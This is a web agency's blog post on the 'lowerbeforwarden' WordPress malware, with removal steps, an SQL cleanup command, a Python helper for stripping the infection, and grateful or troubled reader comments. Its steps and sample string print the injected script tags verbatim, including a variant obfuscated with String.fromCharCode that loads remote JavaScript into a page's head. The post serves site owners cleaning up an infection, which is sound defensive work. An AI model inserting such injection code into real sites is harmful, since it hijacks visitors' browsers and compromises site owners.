File Manager Hacked: Nasty new Malware doing the rounds – lowerbeforwarden

EDIT 6th Sept 2020 00:02: Due to the high volumes of requests for help with this virus, we’ve recorded a video detailing how to fix it. It’s a live run through of a real site, so the video is 50 minutes long, but will hopefully help people solve their issues

EDIT 5th Sept 2020 15:13: Wow this is affecting a lot of sites! Just done one that was slightly different. In the script the n=ns1 part was n=nb5 and this one had some encrypted code too (see further down). Also it had added an exclusion in the Wordfence advanced section to remain undetected

EDIT 5th Sept 2020 14:08: A zero day vulnerability was detected in the popular File Manager plugin and that’s one of the ways the virus was getting in. This has been patched – please update your File Manager plugin if you have it installed

A nasty new piece of malware has started making the rounds. The virus seems to be targeting WordPress sites – this makes sense, as not only does WordPress make up over 1/3 of the internet, but a lot of WordPress sites are out-of-date DIY builds.

Where most malware targets a single vulnerability, the “lowerbeforwarden Virus” seems to use a number of known vulnerabilities.

It seems to have only reared its ugly head on 31st August (2020), so it’s too early to give a full list of the vulnerabilities targeted or to say whether this is a new zero day, but a quick search shows lots of sites infected this week, including:

  • www.airlinehaber.com
  • www.capitalone.com.vn
  • lcps.org.uk
  • megastararena.com
  • www.aplapollo.com
  • www.nahhs.com

How to remove the Lowerbeforwarden Virus from your site

1) The first step is damage limitation, so put your hosting in maintenance mode or “suspend” the service. It’s better that your visitors see a temporarily unavailable message than some random site.

2) Take a full back-up of your code and database.

3) Download your site to your local machine and open the folder in a text editor such as Atom, Sublime, Dreamweaver, etc. Do a “find in files” for the following code and then “replace all” with an empty field:

<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>

3B) Update: some sites have the n=ns1 part replaced with n=nb5, and also contain these scripts, which should be removed using the same method:

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement("script"); elem.type = "text/javascript"; elem.src = "https://scripts.lowerbeforwarden.ml/src.js"; elem.appendAfter(document.getElementsByTagName("script")[0]);elem.appendAfter(document.getElementsByTagName("head")[0]);document.getElementsByTagName("head")[0].appendChild(elem);})();</script>

4) Once you’ve re-uploaded those files you should be able to log in to WordPress again without being redirected. Install the Wordfence plugin and run a scan to clean up any stray malicious files.

5) Some people have also reported finding the same code in the database, so you may need to open your database in something like phpMyAdmin and run this SQL command:

UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", "");
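As an added example (not code from the original post), here is a small Python helper that does the “find in files” and “replace all” of steps 3 and 3B over a downloaded site copy, decoding the String.fromCharCode obfuscation so the encoded variant is caught as well. The names decode_charcodes, strip_injection and clean_tree are this example’s own, and SAMPLE is a constructed stand-in for an infected header.php.

```python
from __future__ import annotations
import re
from pathlib import Path
# Added example, not code from the original post: find and strip the injected
# lowerbeforwarden <script> blocks from steps 3 and 3B across a downloaded site copy.
INDICATOR = "lowerbeforwarden.ml"  # domain both variants load from (quoted in the post)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
# An optional <noscript> decoy followed by one <script> element; variant 3B pairs them.
TAG_RE = re.compile(r"(?:<noscript>.*?</noscript>\s*)?<script\b[^>]*>.*?</script>",
                    re.DOTALL | re.IGNORECASE)

def decode_charcodes(text: str) -> str:
    """Replace each String.fromCharCode(104,101,...) call with the string it builds."""
    return CHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), text)

def strip_injection(text: str) -> tuple[str, int, bool]:
    """Return (cleaned text, blocks removed, needs review): drops every <script> block
    (and its <noscript> decoy) that, once decoded, references the malware domain."""
    removed = 0
    def replace(m: re.Match) -> str:
        nonlocal removed
        if INDICATOR in decode_charcodes(m.group(0)):
            removed += 1
            return ""
        return m.group(0)  # legitimate script: keep it
    cleaned = TAG_RE.sub(replace, text)
    return cleaned, removed, INDICATOR in decode_charcodes(cleaned)

def clean_tree(root: str, write: bool = False) -> dict[str, tuple[int, bool]]:
    """Report {relative path: (blocks removed, needs review)} for infected files under root.
    write=False is the 'find in files' pass; write=True does the 'replace all'."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in (".php", ".html", ".js"):
            continue
        cleaned, removed, review = strip_injection(path.read_text("utf-8", errors="replace"))
        if removed or review:
            report[str(path.relative_to(root))] = (removed, review)
            if write and removed:
                path.write_text(cleaned, encoding="utf-8")
    return report
# Constructed sample mimicking an infected header.php (encoded variant shortened).
SAMPLE = ("<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>\n"
          "<script src='/wp-includes/js/jquery.js'></script>\n"
          "<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type="
          "text/javascript> var e = document.createElement('script'); e.src = String.fromCharCode(104,116,116,112,"
          "115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,"
          "46,109,108,47,115,114,99,46,106,115); document.head.appendChild(e);</script>\n")
```

A file flagged for review still contains the domain outside any <script> tag (for instance the “append” code commenters found in plugin .js files) and needs to be inspected by hand; run clean_tree(root) first and clean_tree(root, write=True) only once the report looks right.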

Obviously, if this all seems like too much, just give us a shout at [email protected] and we’ll fix it for you 🙂

How to prevent it happening again

WordPress is one of the most frequently updated CMSs going, so in most cases, if you keep WordPress and your plugins updated, you’ll be safe from this kind of virus. Keep Wordfence installed too, as it’s a great first line of defence.

Chris Ryu "Chameleon"

Chris has been a developer for over 15 years, known for his unique experience that crosses over many fields.

Comments: 22

  • James Colmer September 5, 2020 7:25 pm

    Oh my god you are a life saver thank you so much

  • Andres GP September 5, 2020 7:40 pm

    Got this virus on one of the sites I administer. I decided to just delete all theme and plugin files and do a WordPress reinstall to be sure.

    I have also found that in the assets/js folders of many of the plugins, and in other folders, all the JS files had been modified with an “append” code.

      • Andres GP September 6, 2020 6:06 pm

        Hi Chris, watching your video now to ensure the site is all set with security. Thanks for this big contribution, my friend.

        You were totally right: we thought we had fixed it, and last night the malware ran again through a script in the uploads folder. Amazing and tricky hack!

        I did a whole server delete except for the upload files (pics only) and wp-config as well, and recopied the new WordPress version and theme.

        Things are going well, and I’m now running a Wordfence scan.

        Thanks for your help and follow up on this malware!

      • Andres GP September 6, 2020 6:07 pm

        BTW, we have also found a whole lot of this script in the database, like you mentioned in the video.

  • Andres to france September 5, 2020 10:39 pm

    Thank you very much, thank you!!!!
    Problem resolved for me.
    The problem was in header.php in my theme,
    and in the database I searched for lowerbeforwarden and deleted it.

    thanks Dorset!

  • Felipe September 6, 2020 3:58 am

    Thank you for this article! A real life saver indeed! 😀

  • Aaron September 6, 2020 11:58 am

    Hi, I work for Dorset Tech. Just so people are aware, some themes come with Theme Options, which allow you to change theme settings and styling specific to your theme. Sometimes it is best to export these options, in case you lose some of the custom styling due to plugin deactivation etc., or you may just need to go back to Theme Options and Save Settings, which I had to do on a site I was fixing from this nasty virus. Hope this helps someone 🙂

  • Mark D September 6, 2020 5:02 pm

    When you go into the SQL and run the update query, yours doesn’t work at first. What was the problem you fixed to make it work? I am having the same issue. If I can’t get it to work, do I just go to every row that has the malicious script in it and delete it?

    Also, most of my infected files appear to be plugins, so can I just delete them all and then reinstall fresh versions?

      • LM September 8, 2020 6:10 pm

        How do you ignore it and run it anyway? I can’t seem to do it, as it gives me an error every time.

  • Aliyu Ndagi September 6, 2020 8:28 pm

    Hello, I also got the same problem this morning. Please, how can I upload it to my SQL, or can you please help me do it?
    I’m running out of data…

      • Aliyu Ndagi September 6, 2020 8:48 pm

        OK sir, thank you very much.
        I will send it now.

  • steve September 7, 2020 7:42 am

    Is it recommended to change database passwords etc. after this infection?

  • Suso September 8, 2020 5:47 pm

    Hello Chris, thank you so much for your help. I found the initial problem in the Uploads folder:

    a PHP file called: wp-stream.php
    and a file called: Ite_

    From there the virus expands itself. It seems like this virus gets an update or something similar; I found SQL commands in the Ite_ files to rename its code.

    Thank you again!

  • R October 2, 2020 11:58 am

    I was affected by this, but I can’t find anything in the database.

    I have had multiple files and folders created. One was a download folder in the public html directory with moban.html and index.html. I then had multiple GIFs which seem to actually be htaccess files. The attacker had added a Google verification HTML file to the public html folder and used it to add many sitemaps/categorymaps and take control of Google console.

    There is also an assortment of other PHP files etc. which I have removed, although I’m not confident the backdoor has been closed. Any advice?

    Usually I would just restore from backups, but all my backups seem to be affected too..

  • Belinda October 24, 2020 9:26 pm

    You’ve ended my four day long hunt!
    God Bless you man. Have a great day!
